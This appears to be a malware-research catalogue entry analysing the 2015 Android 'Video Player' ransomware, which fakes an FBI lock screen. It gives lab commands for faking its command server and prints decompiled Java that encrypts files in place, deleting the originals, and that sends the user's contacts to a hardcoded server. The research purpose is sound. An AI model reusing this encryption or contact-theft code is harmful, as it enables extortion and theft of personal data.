Videoplayer

2015

Summary

Steal, ransom, data encryption and phone locking

GroDDViewer graphs:

Details

Video Player is a ransomware discovered in 2015. It encrypts the user's stored multimedia files and can send an SMS to the user's contacts asking them to download the malware. The malware can also steal the user's contacts and SMS messages. The application impersonates a government agency (the FBI) to demand a ransom.

The application is a fake video player. Its interface is simple, and it cannot actually play a video.

When the phone is locked, the application shows a message saying the user is "guilty of having pornographic files, it is forbidden by US law, you must pay".

The application needs a server to execute the malicious code. However, the original server is down today, so a fake server has been set up to receive the stolen contacts.

Stage 1: Configuration of the fake server

First configure the phone: enable USB tethering (Settings > More > Tethering & portable hotspot > USB tethering).

Then configure the server. IP1 is the address of the host's usb0 interface; 148.251.154.104 is the server address hardcoded in the sample, so the host takes that address and the phone is routed through it:

$ ifconfig                                   (the usb0 interface has the address IP1)
# echo 1 > /proc/sys/net/ipv4/ip_forward      (let the host forward the phone's traffic)
adb shell                                     (the next three commands run on the phone)
netcfg
route add default gw IP1 dev rndis0           (send all the phone's traffic to the host)
exit
ip addr add 148.251.154.104/24 dev eth0       (back on the host: take the hardcoded server address)
python server.py 12449                        (start the fake server on the port the sample uses)

Stage 2: Communication between the client and the server

The client sends several requests to the server:

(POST 148.251.154.104:12449/pha) sends information about the phone.
(GET 148.251.154.104:12449/gac) asks for an order. The client receives the identifier of an order.
(GET 148.251.154.104:12449/eaction) only confirms the order. The client confirms that the request has been carried out; the answer is status code 200.

Other resources

Triggering

To trigger the malware, launch the server and start the application.

Characteristics

Malware type :

  • Ransomware

Attacks :

  • Confidentiality
  • Integrity
  • Availability
  • Normal use

Infection technique : Standalone application

Malicious code type :

  • Use Java code
  • Use native code

Hiding techniques :

  • Not hidden

Triggering techniques :

  • Executed at launch
  • Waits for a particular intent

Samples

Java source code extracts:

crypto.java The function that encrypts a file.
contact.java The function that sends the user's contacts.
commande.java An example of an order (command) received from the server.

crypto.java

  // Hardcoded salt shipped with the sample (its use is not part of this extract).
  private static final byte[] salt = "ThisIsSalt".getBytes();

  // Encrypts the file at paramString in place: the ciphertext is written to
  // "<path>_Enc", then the original is deleted and the encrypted copy is renamed
  // over it. paramInt is the size of the read buffer.
  private static void EncryptFile(String paramString, Key paramKey, int paramInt)
    throws IOException, NoSuchAlgorithmException, NoSuchPaddingException, InvalidKeyException
  {
    FileInputStream localFileInputStream = new FileInputStream(paramString);
    File localFile = new File(paramString + "_Enc");
    if (!localFile.exists()) {
      localFile.createNewFile();
    }
    FileOutputStream localFileOutputStream = new FileOutputStream(localFile);
    // "AES" alone selects the JCE default transformation, AES/ECB/PKCS5Padding.
    Cipher localCipher = Cipher.getInstance("AES");
    localCipher.init(Cipher.ENCRYPT_MODE, paramKey); // the decompiled code passes the literal 1
    CipherOutputStream localCipherOutputStream = new CipherOutputStream(localFileOutputStream, localCipher);
    byte[] localBuffer = new byte[paramInt];
    for (;;)
    {
      int i = localFileInputStream.read(localBuffer, 0, paramInt);
      if (i == -1) {
        break;
      }
      localCipherOutputStream.write(localBuffer, 0, i);
    }
    localCipherOutputStream.close();
    // Replace the plaintext file with the encrypted one.
    File localOriginal = new File(paramString);
    localOriginal.delete();
    localFile.renameTo(localOriginal);
    localFileInputStream.close();
  }

contact.java

  // Reads the device's contacts, wraps each one in a ContactEntry and sends the
  // whole list to the server through the request queue (mRQ), waiting up to 30 s
  // for the answer.
  private void getAndSendContactData()
  {
    Object localObject = DataHelper.getContactList(this);
    ArrayList localArrayList = new ArrayList(((List)localObject).size());
    localObject = ((List)localObject).iterator();
    while (((Iterator)localObject).hasNext()) {
      localArrayList.add(new ContactEntry((Contact)((Iterator)localObject).next()));
    }
    // The same future object receives both the success and the error callback.
    localObject = RequestFuture.newFuture();
    this.mRQ.add(new ContactsRequest(localArrayList, (Response.Listener)localObject, (Response.ErrorListener)localObject));
    try
    {
      ((RequestFuture)localObject).get(30L, TimeUnit.SECONDS);
      Log.d("CheckerSrv", "Contacts sending request succeeded");
      return;
    }
    catch (Exception localException)
    {
      Log.e("CheckerSrv", "Contacts sending request failed. " + localException.getLocalizedMessage());
    }
  }

commande.java

// An order received from the server (GET /gac). Gson maps the JSON field "id"
// onto mId; ActionType.forCommandId then turns that number into the action to run.
public class CommandData
{
  @SerializedName("id")
  int mId;
  
  public ActionType getActionType()
  {
    return ActionType.forCommandId(this.mId);
  }
  
  public int getId()
  {
    return this.mId;
  }
}
